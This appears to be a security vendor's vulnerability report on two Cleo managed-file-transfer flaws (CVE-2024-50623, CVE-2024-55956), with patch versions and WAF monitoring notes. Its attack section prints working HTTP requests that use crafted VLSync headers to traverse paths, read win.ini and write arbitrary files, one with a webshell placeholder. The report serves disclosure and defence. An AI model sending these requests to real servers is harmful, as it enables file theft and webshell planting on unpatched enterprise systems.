Vulnerability report written by the TA team by analyzing "Cleo Harmony, VLTrader and LexiCom File Read/Write Vulnerability"
The vulnerability is a file read/write vulnerability in the software provided by Cleo that attempts to access or upload malicious files in the service using the software through a manipulated VLSync header.
The vulnerabilities were patched in Harmony, VLTrader, LexiCom 5.8.0.21 and 5.8.0.24, and AIWAF is continuously monitoring related vulnerabilities.
1. Overview
Cleo is a software organization that offers a piece of software called Managed File Transfer Solutions and includes features such as Harmony, VLTrader, and LexiCom. In this report, Cleo summarizes our analysis of CVE-2024-50623 and CVE-2024-55956, a file read and write vulnerability in their software.
Source : https://www.helpnetsecurity.com/2024/12/10/cve-2024-50623-cleo-file-transfer-software-vulnerabilities-exploited/
2. Attack Type
CVE-2024-50623 is a file read and write vulnerability in Cleo Harmony, VLTrader, and LexiCom software that leverages a weak number validation in the /Synchronization endpoint, which handles file synchronization, to either fetch arbitrary file data by sending a crafted VLSync header or write arbitrary files by sending malicious Webshell.
Read the win.ini file using a GET request :
GET /Synchronization HTTP/1.1
Host: www.test.com
VLSync: Retrieve;l=Ab1234-RQ0258;n=VLTrader;v=5.7.0.0;a=1337;po=1337;s=True;b=False;pp=myEncryptedPassphrase;path=..\..\..\windows\win.ini
Content-Type: multipart/form-data; boundary=---------------------------12345678901234567890123456
Content-Length: 0
Generating a test.txt file using a POST request :
POST /Synchronization HTTP/1.1
Host: www.test.com
VLSync: ADD;l=Ab1234-RQ0258;n=VLTrader;v=5.7.0.0;a=1337;po=1337;s=True;b=False;pp=myEncryptedPassphrase;path=..\..\..\test.txt
Content-Type: multipart/form-data; boundary=-----1337
Content-Length: 14
cve-2024-50623
CVE-2024-55956 is a file write vulnerability found in the patched version of CVE-2024-50623, which allows malicious Webshell content to be written to arbitrary files by sending a request with the VLSync: Multipart;l=0,Acknowledge header.
However, this vulnerability is different from CVE-2024-50623 in that it only allows file writes.
Using POST requests to create a temp/hax.txt file :
POST /Synchronization HTTP/1.1
Host: 192.168.86.50:5080
Connection: close
Content-Type: application/form-data;boundary=--------boundary
VLSync: Multipart;l=0,Acknowledge
Content-Length: 119
VLSync: ReceivedReceipt;service="AS2";msgId=12345;path="temp/hax.txt";receiptfolder=Unspecified;
--------boundary
<Malware code>
3. Response
CVE-2024-50623 is addressed in the Harmony, VLTrader, and LexiCom 5.8.0.21 patches, and CVE-2024-55956 is addressed in the Harmony, VLTrader, and LexiCom 5.8.0.24 patches.
The vulnerabilities appear to be related to sending a request with a crafted VLSync header and will be further analyzed and responded to as a pattern in our AIWAF products.
4. Conclusion
Cleo Harmony, VLTrader, and LexiCom are software that power managed file transfer (MFT) solutions and are used by many large enterprises, and with CISA warning that the vulnerabilities are being actively leveraged in ransomware attacks, customers and enterprises using these software should update to the latest versions as soon as possible.
Our AIWAF product continues to monitor for vulnerabilities in software provided by Cleo and will continue to respond quickly to any related vulnerabilities that are discovered.
